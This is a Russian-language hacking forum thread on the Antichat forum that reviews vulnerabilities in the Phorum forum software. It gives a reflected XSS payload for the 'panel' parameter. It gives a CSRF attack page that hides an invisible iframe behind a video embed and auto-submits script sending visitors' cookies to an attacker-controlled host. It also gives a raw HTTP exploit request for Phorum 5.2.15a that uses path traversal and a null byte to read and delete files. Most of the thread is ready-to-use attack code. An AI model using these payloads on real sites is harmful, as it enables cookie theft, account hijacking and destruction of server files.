Форум АНТИЧАТ - [Обзор уязвимостей Phorum]

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - [Обзор уязвимостей Phorum] (https://forum.antichat.xyz/showthread.php?t=27224)

XSS (все версии)

Код:

} elseif(isset($_POST["panel"])){

    $panel = $_POST["panel"];

Видно, что фильтрации на символы нету,и что можно использовать <, >, запятую, которые могут быть преобразованы в HTML. Можно воспользоватся этим:

Код:

<form method="post" action="http://web/path/control.php">

<input type="text" name="panel" value="Тут XSS" />

<input type="submit" value=" Submit "/>

</form>

Отправляем нечто вроде: "><h1>проверка" и видим что переменная $panel инфицировалась.

Код:

$PHORUM['DATA']['POST_VARS'].="<input type=\"hidden\" name=\"panel\" value=\"{$panel}\" />\n";

CSRF Уязвимость

Создаем файл, в котором будет :
Index.html

Код:

<object width="425" height="344">

<param name="movie" value="http://www.youtube.com/v/GIiFGMYpLUc&hl=es&fs=1">

</param>

<param name="allowFullScreen" value="true">

</param>

<param name="allowscriptaccess" value="always">

</param>

<embed src="http://www.youtube.com/v/GIiFGMYpLUc&hl=es&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344">

</embed>

</object>

<br><br><br><br><br><br><br><br>

<br><br><br><br><br><br><br><br>

<br><br><br><br><br><br><br><br>

<br><br>

<iframe src="test.html" width="1" height="1" frameborder="0"></iframe>

test.html

Код:

<form method="post" action="http://forum.ru/control.php">

<input type="hidden" value='">

<script>document.location="http://mi_ip/metopo.json?req=" + document.cookie;</script>

<br x="' name="panel"/>

<input type="submit" value=" Submit "/>

</form>

<script>document.getElementsByTagName("form")[0].submit();</script>

Phorum 5.2.15a File Disclosure + File Deletion Vulnerability

Phorum version 5.2.15a

File Disclosure + File Deletion

Vuln file: /mods/spamhurdles/captcha/spoken_captcha.php

PHP код:


		
			
/*...*/

    global $PHORUM;

    $conf = $PHORUM["mod_spamhurdles"];



    if ($conf["spoken_captcha"] && file_exists($conf["flite_location"]) &&

        isset($PHORUM["SPAMHURDLES"]["captcha"]["spoken_text"]))

    {

/*...*/

        $tmpfile = "{$PHORUM["cache"]}/spokencaptcha_{$key}.wav";

/*...*/

        if (file_exists($tmpfile) and filesize($tmpfile) > 0) {

            header("Content-Type: audio/x-wav");

            header("Content-Disposition: attachment; filename=captchacode.wav");

            header("Content-Length: " . filesize($tmpfile)); 

            readfile($tmpfile);

            unlink($tmpfile);

            exit(0);

/*...*/

Need: magic_quotes = Off && register_globals = On
Exploit:

Код:

POST http://[host]/[path]/mods/spamhurdles/captcha/spoken_captcha.php HTTP/1.0

Content-type: application/x-www-form-urlencoded



PHORUM[mod_spamhurdles][spoken_captcha]=1&PHORUM[mod_spamhurdles][flite_location]=spoken_captcha.php&PHORUM[SPAMHURDLES][captcha][spoken_text]=1&PHORUM[cache]=../../../scripts/.htaccess%00